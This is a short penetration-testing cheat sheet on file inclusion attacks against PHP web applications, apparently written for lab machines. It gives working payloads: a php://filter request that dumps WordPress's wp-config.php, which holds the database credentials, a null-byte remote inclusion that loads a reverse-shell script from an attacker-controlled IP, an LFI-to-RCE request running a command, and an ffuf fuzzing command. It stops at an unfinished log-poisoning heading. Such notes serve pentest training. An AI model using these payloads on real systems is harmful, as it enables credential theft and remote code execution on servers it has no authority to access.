PHP Wrapper for reading the contents of .php files
php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php
Example:
<http://172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php>
Null byte injection to cut appended extensions in LFI
10.11.1.8/?ACS_path=http://192.168.119.122/Utilities/Revshells/shell.php%00
LFI can be useful to trigger RCE exploited in other routes
<http://10.11.1.113/alertConfigField.php?urlConfig=../../../usr/local/databases/shell.php&cmd=id>
Files to look for in windows
https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/
Files in linux
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
LFI Fuzzing
ffuf -u <http://machine.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=FUZZ> -w file_inclusion_linux.txt -fs 0-1000
LFI to RCE : Log Poisioning